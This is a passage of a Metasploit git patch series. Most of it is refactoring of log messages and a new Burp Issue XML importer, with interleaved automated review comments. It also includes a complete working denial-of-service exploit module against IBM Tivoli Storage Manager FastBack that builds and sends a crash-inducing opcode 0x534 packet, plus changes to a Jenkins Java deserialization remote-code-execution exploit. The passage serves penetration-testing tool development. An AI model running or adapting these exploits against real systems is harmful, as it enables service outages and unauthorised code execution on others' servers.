@@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary end if fint_numbers.empty? - print_error("#{peer} - FINTNUMBER required to forward calls") + print_error("FINTNUMBER required to forward calls") return end fint_numbers.each do |fintnumber| - print_status("#{peer} - Sending call forward request for #{fintnumber}") + print_status("Sending call forward request for #{fintnumber}") send_request_cgi( { @@ -138,9 +138,9 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.body && res.body && res.body.to_s =~ /CFA/ - print_good("#{peer} - Call forwarded successfully for #{fintnumber}") + print_good("Call forwarded successfully for #{fintnumber}") else - print_status("#{peer} - Call forward failed.") + print_status("Call forward failed.") end end end diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index ae40518cd1..cccf08529f 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/ return Exploit::CheckCode::Vulnerable, res else - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") return Exploit::CheckCode::Safe, res end end @@ -98,17 +98,17 @@ class Metasploit3 < Msf::Auxiliary info << "Name: #{names[i].split(":")[1]}, " info << "Telephone: #{phones[i]}" - print_good("#{peer} - #{info}") + print_good("#{info}") end else - print_status("#{peer} - No Speed Dial detected") + print_status("No Speed Dial detected") end end def list mac = datastore['MAC'] - print_status("#{peer} - Getting Speed Dials of the IP phone") + print_status("Getting Speed Dials of the IP phone") vars_get = { 'device' => "SEP#{mac}" } 
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", 'telno' => "#{telno}", @@ -134,11 +134,11 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body && res.body.to_s =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary mac = datastore['MAC'] position = datastore['POSITION'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", @@ -156,9 +156,9 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") + print_good("Speed Dial #{position} is deleted successfully") else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", 
@@ -178,8 +178,8 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_good("Speed Dial #{position} is deleted successfully") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", @@ -192,14 +192,14 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end end From 47c0a3b4a71418c4b80b16119d7188cfa918aa73 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 1 Feb 2016 16:21:10 -0600 Subject: [PATCH 34/71] Get some stragglers that had a different format --- modules/auxiliary/admin/atg/atg_client.rb | 8 ++++---- modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb | 12 ++++++------ modules/auxiliary/scanner/rdp/ms12_020_check.rb | 4 ++-- modules/auxiliary/scanner/rsync/modules_list.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_version.rb | 8 ++++---- 5 files changed, 17 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/admin/atg/atg_client.rb b/modules/auxiliary/admin/atg/atg_client.rb index 5560f2f76d..357338b434 100644 --- a/modules/auxiliary/admin/atg/atg_client.rb 
+++ b/modules/auxiliary/admin/atg/atg_client.rb @@ -225,9 +225,9 @@ class Metasploit3 < Msf::Auxiliary when 'SET_TANK_NAME' # send the set tank name command to change the tank name(s) if tank_number == 0 - vprint_status("#{peer} -- setting all tank names to #{tank_name}") + vprint_status("Setting all tank names to #{tank_name}") else - vprint_status("#{peer} -- setting tank ##{tank_number}'s name to #{tank_name}") + vprint_status("Setting tank ##{tank_number}'s name to #{tank_name}") end request = "#{action.opts[protocol_opt_name]}#{format('%02d', tank_number)}#{tank_name}\n" sock.put(request) @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # send an inventory probe to show that it succeeded inventory_probe = "#{actions.find { |a| a.name == 'INVENTORY' }.opts[protocol_opt_name]}\n" inventory_response = get_response(inventory_probe) - message = "#{peer} #{protocol} #{action.opts['Description']}:\n#{inventory_response}" + message = "#{protocol} #{action.opts['Description']}:\n#{inventory_response}" if inventory_response.include?(tank_name) print_good message else @@ -245,7 +245,7 @@ class Metasploit3 < Msf::Auxiliary end else response = get_response("#{action.opts[protocol_opt_name]}\n") - print_good("#{peer} #{protocol} #{action.opts['Description']}:\n#{response}") + print_good("#{protocol} #{action.opts['Description']}:\n#{response}") end ensure disconnect diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 405e6e1851..21e6d9ffb1 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb 
@@ -51,14 +51,14 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(_ip) - print_status("#{peer}: Checking for DLSw information disclosure (CVE-2014-7992)") + print_status("Checking for DLSw information disclosure (CVE-2014-7992)") response = get_response if response.blank? - vprint_status("#{peer}: no response") + vprint_status("No response") Exploit::CheckCode::Safe elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48" - vprint_good("#{peer}: Detected DLSw protocol") + vprint_good("Detected DLSw protocol") report_service( host: rhost, port: rport, @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary # TODO: check that response has something that truly indicates it is vulnerable # and not simply that it responded unless response[18..72].scan(/\x00/).length == 54 - print_good("#{peer}: vulnerable to DLSw information disclosure; leaked #{response.length} bytes") + print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes") report_vuln( host: rhost, port: rport, @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary Exploit::CheckCode::Vulnerable end else - vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data") + vprint_status("#{response.size}-byte response didn't contain any leaked data") Exploit::CheckCode::Safe end end @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary 'DLSw_leaked_data', 'DLSw packet memory leak' ) - print_status("#{peer}: DLSw leaked data stored in #{path}") + print_status("DLSw leaked data stored in #{path}") end end diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index d9fca848d7..f9174649d9 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb 
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary def check_rdp # code to check if RDP is open or not - vprint_status("#{peer} Verifying RDP protocol...") + vprint_status("Verifying RDP protocol...") # send connection sock.put(connection_request) @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary def check_rdp_vuln # check if rdp is open unless check_rdp - vprint_status "#{peer} Could not connect to RDP." + vprint_status "Could not connect to RDP." return Exploit::CheckCode::Unknown end diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 547e102a79..9bdfaaf4f5 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary begin modules_metadata = rsync_list rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} -- error while listing modules: #{e}") + vprint_error("Error while listing modules: #{e}") return ensure disconnect diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index 5371196d34..885d224e51 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary resp = sock.get_once(-1, timeout) if ! resp - vprint_warning("#{peer} no response") + vprint_warning("No response") return end @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary info = "" if /^SSH-\d+\.\d+-(.*)$/ !~ ident - vprint_warning("#{peer} was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") + vprint_warning("Was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") return end 
@@ -85,11 +85,11 @@ class Metasploit3 < Msf::Auxiliary end end - print_status("#{peer} SSH server version: #{ident}#{info}") + print_status("SSH server version: #{ident}#{info}") report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ident) end rescue Timeout::Error - vprint_warning("#{peer} timed out after #{timeout} seconds. Skipping.") + vprint_warning("Timed out after #{timeout} seconds. Skipping.") ensure disconnect end From 208420d7410bb90c173dde5635a9007c0dff629c Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 2 Feb 2016 10:02:32 -0600 Subject: [PATCH 35/71] Sort methods --- lib/msf/core/exploit/udp.rb | 25 ++++++++++++------------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/exploit/udp.rb b/lib/msf/core/exploit/udp.rb index 2a7eedce31..8b503dc4cd 100644 --- a/lib/msf/core/exploit/udp.rb +++ b/lib/msf/core/exploit/udp.rb @@ -107,17 +107,17 @@ module Exploit::Remote::Udp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the local port for outgoing connections # - def rport - datastore['RPORT'] + def cport + datastore['CPORT'] end # @@ -135,20 +135,19 @@ module Exploit::Remote::Udp end # - # Returns the local host for outgoing connections + # Returns the target host # - def chost - datastore['CHOST'] + def rhost + datastore['RHOST'] end # - # Returns the local port for outgoing connections + # Returns the remote port # - def cport - datastore['CPORT'] + def rport + datastore['RPORT'] end - protected attr_accessor :udp_sock From 4dcbd7c1aebcfa83d16f9264cdcc95227a276d7f Mon Sep 17 00:00:00 2001 
From: Brian Patterson <Brian_Patterson@rapid7.com> Date: Mon, 1 Feb 2016 16:11:06 -0600 Subject: [PATCH 36/71] Add a nokogiri xml stream parser for Burp issue xml and rename original burp parser to burp session parser so both are supported. --- lib/msf/core/db_manager/import.rb | 9 +- lib/msf/core/db_manager/import/burp_issue.rb | 20 +++ .../import/{burp.rb => burp_session.rb} | 2 +- lib/msf/ui/console/command_dispatcher/db.rb | 1 + lib/rex/parser/burp_issue_nokogiri.rb | 139 ++++++++++++++++++ lib/rex/parser/burp_session_nokogiri.rb | 2 +- lib/rex/parser/nokogiri_doc_mixin.rb | 5 + .../ui/console/command_dispatcher/db_spec.rb | 1 + 8 files changed, 175 insertions(+), 4 deletions(-) create mode 100644 lib/msf/core/db_manager/import/burp_issue.rb rename lib/msf/core/db_manager/import/{burp.rb => burp_session.rb} (96%) create mode 100644 lib/rex/parser/burp_issue_nokogiri.rb diff --git a/lib/msf/core/db_manager/import.rb b/lib/msf/core/db_manager/import.rb index c93fb6cb5b..c5a0e9d8d4 100644 --- a/lib/msf/core/db_manager/import.rb +++ b/lib/msf/core/db_manager/import.rb @@ -16,7 +16,8 @@ module Msf::DBManager::Import autoload :Acunetix, 'msf/core/db_manager/import/acunetix' autoload :Amap, 'msf/core/db_manager/import/amap' autoload :Appscan, 'msf/core/db_manager/import/appscan' - autoload :Burp, 'msf/core/db_manager/import/burp' + autoload :BurpIssue, 'msf/core/db_manager/import/burp_issue' + autoload :BurpSession, 'msf/core/db_manager/import/burp_session' autoload :CI, 'msf/core/db_manager/import/ci' autoload :Foundstone, 'msf/core/db_manager/import/foundstone' autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm' 
@@ -41,7 +42,8 @@ module Msf::DBManager::Import include Msf::DBManager::Import::Acunetix include Msf::DBManager::Import::Amap include Msf::DBManager::Import::Appscan - include Msf::DBManager::Import::Burp + include Msf::DBManager::Import::BurpIssue + include Msf::DBManager::Import::BurpSession include Msf::DBManager::Import::CI include Msf::DBManager::Import::Foundstone include Msf::DBManager::Import::FusionVM @@ -267,6 +269,9 @@ module Msf::DBManager::Import elsif (data[0,1024] =~ /<!ATTLIST\s+items\s+burpVersion/) @import_filedata[:type] = "Burp Session XML" return :burp_session_xml + elsif (data[0,1024] =~ /<!ATTLIST\s+issues\s+burpVersion/) + @import_filedata[:type] = "Burp Issue XML" + return :burp_issue_xml elsif (firstline.index("<?xml")) # it's xml, check for root tags we can handle line_count = 0 diff --git a/lib/msf/core/db_manager/import/burp_issue.rb b/lib/msf/core/db_manager/import/burp_issue.rb new file mode 100644 index 0000000000..b043d32714 --- /dev/null +++ b/lib/msf/core/db_manager/import/burp_issue.rb @@ -0,0 +1,20 @@ +require 'rex/parser/burp_issue_nokogiri' + +module Msf::DBManager::Import::BurpIssue + def import_burp_issue_xml(args={}, &block) + bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] + wspace = args[:wspace] || workspace + parser = "Nokogiri v#{::Nokogiri::VERSION}" + noko_args = args.dup + noko_args[:blacklist] = bl + noko_args[:wspace] = wspace + if block + yield(:parser, parser) + doc = Rex::Parser::BurpIssueDocument.new(args,framework.db) {|type, data| yield type,data } + else + doc = Rex::Parser::BurpIssueDocument.new(args,self) + end + parser = ::Nokogiri::XML::SAX::Parser.new(doc) + parser.parse(args[:data]) + end +end diff --git a/lib/msf/core/db_manager/import/burp.rb b/lib/msf/core/db_manager/import/burp_session.rb similarity index 96% rename from lib/msf/core/db_manager/import/burp.rb rename to lib/msf/core/db_manager/import/burp_session.rb index aa5e2f54a8..cbed07fee3 100644 
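Review bot: In the new burp_issue.rb, `import_burp_issue_xml` builds `noko_args` with the validated blacklist and the defaulted workspace, but both constructor calls pass the original `args`, so `noko_args` is never used. The parser added later in this patch reads `@args[:wspace]`, which will be nil whenever the caller did not supply a workspace. Pass the prepared hash instead: `Rex::Parser::BurpIssueDocument.new(noko_args, framework.db) { |type, data| yield type, data }` and `Rex::Parser::BurpIssueDocument.new(noko_args, self)`. The local `parser` is also reused for both the version string and the SAX parser; a separate name such as `sax_parser` would read more clearly.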
--- a/lib/msf/core/db_manager/import/burp.rb +++ b/lib/msf/core/db_manager/import/burp_session.rb @@ -1,6 +1,6 @@ require 'rex/parser/burp_session_nokogiri' -module Msf::DBManager::Import::Burp +module Msf::DBManager::Import::BurpSession def import_burp_session_noko_stream(args={},&block) if block doc = Rex::Parser::BurpSessionDocument.new(args,framework.db) {|type, data| yield type,data } diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index f3c36e8463..adf95b3f6a 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1647,6 +1647,7 @@ class Db print_line " Amap Log -m" print_line " Appscan" print_line " Burp Session XML" + print_line " Burp Issue XML" print_line " CI" print_line " Foundstone" print_line " FusionVM XML" diff --git a/lib/rex/parser/burp_issue_nokogiri.rb b/lib/rex/parser/burp_issue_nokogiri.rb new file mode 100644 index 0000000000..c14ec9c869 --- /dev/null +++ b/lib/rex/parser/burp_issue_nokogiri.rb 
@@ -0,0 +1,139 @@ +# -*- coding: binary -*- +require "rex/parser/nokogiri_doc_mixin" +require 'uri' + +module Rex + module Parser + + # If Nokogiri is available, define Burp Issue document class. + load_nokogiri && class BurpIssueDocument < Nokogiri::XML::SAX::Document + + include NokogiriDocMixin + + def start_element(name=nil,attrs=[]) + attrs = normalize_attrs(attrs) + block = @block + @state[:current_tag][name] = true + case name + when "host", "name", "info", "issueDetail", "references" + @state[:has_text] = true + end + end + + def end_element(name=nil) + block = @block + case name + when "issue" + report_web_host_info + report_web_service_info + report_vuln + # Reset the state once we close a host + @state = @state.select {|k| [:current_tag].include? k} + when "host" + @state[:has_text] = false + collect_host_info + @text = nil + when "name" + @state[:has_text] = false + collect_name + @text = nil + when "issueDetail" + @state[:has_text] = false + collect_issue_detail + @text = nil + when "references" + @state[:has_text] = false + collect_references + @text = nil + end + @state[:current_tag].delete name + end + + def collect_host_info + return unless in_issue + return unless has_text + uri = URI(@text) + + @state[:host] = uri.host + @state[:service_name] = uri.scheme + @state[:proto] = "tcp" + + case @state[:service_name] + when "http" + @state[:port] = 80 + when "https" + @state[:port] = 443 + end + end + + def collect_name + return unless in_issue + return unless has_text + @state[:vuln_name] = @text + end + + def collect_issue_detail + return unless in_issue + return unless has_text + @state[:issue_detail] = @text + end + + def collect_references + return unless in_issue + return unless has_text + uri = @text.match('href=[\'"]?([^\'" >]+)')[1] + @state[:refs] = ["URI-#{uri}"] + end + + def report_web_host_info + return unless @state[:host] + address = Rex::Socket.resolv_to_dotted(@state[:host]) rescue nil + host_info = {:workspace => @args[:wspace]} + 
host_info[:address] = address + host_info[:name] = @state[:host] + db_report(:host, host_info) + end + + def report_web_service_info + return unless @state[:host] + return unless @state[:port] + return unless @state[:proto] + return unless @state[:service_name] + service_info = {} + service_info[:host] = @state[:host] + service_info[:port] = @state[:port] + service_info[:proto] = @state[:proto] + service_info[:name] = @state[:service_name] + @state[:service_object] = db_report(:service, service_info) + end + + def report_vuln + return unless @state[:service_object] + return unless @state[:vuln_name] + return unless @state[:issue_detail] + return unless @state[:refs] + vuln_info = {} + vuln_info[:service_id] = @state[:service_object].id + vuln_info[:host] = @state[:host] + vuln_info[:name] = @state[:vuln_name] + vuln_info[:info] = @state[:issue_detail] + vuln_info[:refs] = @state[:refs] + @state[:vuln_object] = db_report(:vuln, vuln_info) + end + + def in_issue + return false unless in_tag("issue") + return false unless in_tag("issues") + return true + end + + def has_text + return false unless @text + return false if @text.strip.empty? + @text = @text.strip + end + end + + end +end + diff --git a/lib/rex/parser/burp_session_nokogiri.rb b/lib/rex/parser/burp_session_nokogiri.rb index 2822fa28bf..057c5dae53 100644 --- a/lib/rex/parser/burp_session_nokogiri.rb +++ b/lib/rex/parser/burp_session_nokogiri.rb @@ -157,7 +157,7 @@ module Rex host_info = {:workspace => @args[:wspace]} host_info[:address] = @state[:web_site].service.host.address host_info[:name] = @state[:uri].host - report_db(:host, host_info) + db_report(:host, host_info) end def report_web_service_info diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb index bfee26fa8c..9e59c56061 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb 
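Review bot: In burp_issue_nokogiri.rb, `collect_references` and `collect_host_info` can abort the whole import on malformed input from the imported file. `@text.match('href=...')[1]` raises NoMethodError when a `references` element contains no `href`, and `URI(@text)` raises URI::InvalidURIError on a malformed `host` value. The port is also fixed at 80 or 443 by scheme, so if the host text carries an explicit port the issue is recorded against the wrong service. The sketch below guards the match, rescues the URI error and takes the port from `uri.port`. Separately, `report_web_host_info` resolves the hostname with an inline `rescue nil` and can then report a host whose address is nil; returning early when resolution fails would be safer.

```ruby
def collect_host_info
  # … unchanged: in_issue / has_text guards …
  begin
    uri = URI(@text)
  rescue URI::InvalidURIError
    return
  end
  # … unchanged: host, service_name and proto assignments …
  @state[:port] = uri.port # explicit port if present, else the scheme default
end

def collect_references
  # … unchanged: in_issue / has_text guards …
  href = @text.match('href=[\'"]?([^\'" >]+)')
  return unless href
  @state[:refs] = ["URI-#{href[1]}"]
end
```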
@@ -200,6 +200,11 @@ module Parser return attr_pairs end + # Removes HTML from a string + def strip_html_tags(text) + return text.gsub!(/(<[^>]*>)|\n|\t/s) {" "} + end + # This breaks xml-encoded characters, so need to append. # It's on the end_element tag name to turn the appending # off and clear out the data. diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb index 66a8edcde3..28605ad12b 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb @@ -340,6 +340,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do " Amap Log", " Amap Log -m", " Appscan", + " Burp Issue XML", " Burp Session XML", " CI", " Foundstone", From 54566823f58d1650bd9675dd88cce4eb864c6f53 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Mon, 8 Feb 2016 14:36:14 -0600 Subject: [PATCH 37/71] Add IBM TSM Fastback denial of service module --- modules/exploits/windows/misc/ibm_tsm_dos.rb | 96 ++++++++++++++++++++ 1 file changed, 96 insertions(+) create mode 100644 modules/exploits/windows/misc/ibm_tsm_dos.rb diff --git a/modules/exploits/windows/misc/ibm_tsm_dos.rb b/modules/exploits/windows/misc/ibm_tsm_dos.rb new file mode 100644 index 0000000000..9d49daf331 --- /dev/null +++ b/modules/exploits/windows/misc/ibm_tsm_dos.rb 
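Review bot: `strip_html_tags` returns the result of `gsub!`, which is nil when nothing was replaced, so text with no tags, newlines or tabs comes back as nil. `gsub!` also modifies the caller's string in place. Use the non-destructive form with a plain replacement: `text.gsub(/(<[^>]*>)|\n|\t/, ' ')`. The trailing `s` on the regex literal is Ruby's Windows-31J encoding flag, not a dot-matches-newline switch, and the pattern contains no `.`, so it can most likely be dropped; worth confirming nothing relies on it. The comment could also say that newlines and tabs are replaced with spaces, not only tags.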
@@ -0,0 +1,96 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + 'Description' => %q{ + This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server + when dealing with packets triggering the opcode 0x534 handler + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gianni Gnesa', # Public disclosure/Proof of Concept + 'William Webb <william_webb[at]rapid7.com>', # Metasploit + ], + 'References' => + [ + ['URL', 'https://www.exploit-db.com/exploits/38979/'] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'DefaultOptions' => + { + 'DisablePayloadHandler' => 'true', + }, + 'Platform' => 'win', + 'Targets' => + [ + ['IBM Tivoli Storage Manager FastBack Server 5.5.4.2', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 15 2015", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(11460) + ], self.class) + end + + def tv_pkt(opcode, p1="", p2="", p3="") + buf = Rex::Text.rand_text_alpha(0x0C) + buf += [opcode].pack("V") + buf += [0x00].pack("V") + buf += [p1.length].pack("V") + buf += [p1.length].pack("V") + buf += [p2.length].pack("V") + buf += [p1.length + p2.length].pack("V") + buf += [p3.length].pack("V") + + buf += Rex::Text.rand_text_alpha(0x08) + + buf += p1 + buf += p2 + buf += p3 + + pkt = [buf.length].pack("N") + pkt << buf + + return pkt + end + + def exploit + ip = datastore['RHOST'] + port = datastore['RPORT'] + + target_opcode = 0x534 + connect + print_status("Connected to: #{datastore['RHOST'].to_s} port: #{datastore['RPORT']}") + print_status("Sending malicious packet") + + p = tv_pkt(target_opcode, + p1 = "File: %s 
From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], + p2 = Rex::Text.rand_text_alpha(0x60), + p3 = Rex::Text.rand_text_alpha(0x60) + ) + + sock.put(p) + disconnect + print_status("Packet sent!") + rescue ::Exception => ex + print_status("Exploit failed: #{ex.class}: #{ex.message}") + end +end From d60dcf72f9d9a7f891eae83f2a2cf01f46182d7e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 8 Feb 2016 18:16:48 -0600 Subject: [PATCH 38/71] Resolve #6546, support manual config for X-Jenkins-CLI-Port Resolve #6546 --- .../exploits/linux/misc/jenkins_java_deserialize.rb | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index c7eec77106..728dc431f7 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']), Opt::RPORT('8080') ], self.class) + + register_advanced_options([ + OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) + ], self.class) + end + + def cli_port + @jenkins_cli_port || datastore['XJenkinsCliPort'] end def exploit - unless vulnerable? + unless cli_port || vulnerable? fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") end invoke_remote_method(set_payload) @@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote def invoke_remote_method(serialized_java_stream) begin - socket = connect(true, {'RPORT' => @jenkins_cli_port}) + socket = connect(true, {'RPORT' => cli_port}) print_status 'Sending headers...' socket.put(read_bin_file('serialized_jenkins_header')) From 1d6b782cc8d7c1c29ff4cc0dfaa09c90254ad693 Mon Sep 17 00:00:00 2001 
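Review bot: In `exploit`, the call `tv_pkt(target_opcode, p1 = ..., p2 = ..., p3 = ...)` reads like keyword arguments, but it assigns three throwaway locals and passes them positionally; drop the `p1 =`, `p2 =` and `p3 =` prefixes. The locals `ip` and `port` are assigned and never read, since the status line goes back to `datastore`. In `tv_pkt`, `p1.length` is packed twice in a row with no explanation; if the header format needs that, a comment such as `# p1 length is repeated in the header` would stop a later reader from treating it as a copy-paste slip.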
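Review bot: The new `cli_port` helper has no comment stating which source wins: as written, `@jenkins_cli_port || datastore['XJenkinsCliPort']` prefers a previously discovered port over the value the operator set explicitly. Where `@jenkins_cli_port` is assigned is outside this hunk, so whether both can be set at once is not visible here. If the manual option is meant to be an override, the operands should be swapped. Either way, a line such as `# Discovered port takes precedence over the XJenkinsCliPort option` above the method would make the intent checkable.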
From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 8 Feb 2016 18:40:48 -0600 Subject: [PATCH 39/71] Change logic I just can't deal with this "unless" syntax... --- modules/exploits/linux/misc/jenkins_java_deserialize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index 728dc431f7..22ac86212d 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - unless cli_port || vulnerable? + if cli_port == 0 && !vulnerable? fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") end invoke_remote_method(set_payload) From eadbb6b58232c5c49c66288826a218f5cb92100e Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Tue, 9 Feb 2016 11:44:01 -0600 Subject: [PATCH 40/71] moved module to modules/auxiliary/dos/misc --- .../windows => auxiliary/dos}/misc/ibm_tsm_dos.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename modules/{exploits/windows => auxiliary/dos}/misc/ibm_tsm_dos.rb (87%) diff --git a/modules/exploits/windows/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb similarity index 87% rename from modules/exploits/windows/misc/ibm_tsm_dos.rb rename to modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 9d49daf331..57fbd58292 100644 --- a/modules/exploits/windows/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Gianni Gnesa', # Public disclosure/Proof of Concept + 'Gianni 